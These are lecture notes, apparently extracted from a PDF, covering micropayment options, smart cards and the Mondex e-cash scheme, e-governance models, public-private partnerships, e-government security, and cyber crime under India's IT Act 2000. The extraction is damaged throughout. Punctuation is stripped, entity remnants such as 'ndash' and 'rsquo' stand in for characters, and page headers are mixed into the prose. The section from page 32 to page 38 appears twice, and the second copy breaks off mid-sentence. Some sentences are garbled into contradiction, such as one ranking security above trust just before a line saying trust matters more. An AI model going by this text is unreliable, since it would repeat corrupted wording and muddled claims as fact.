PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
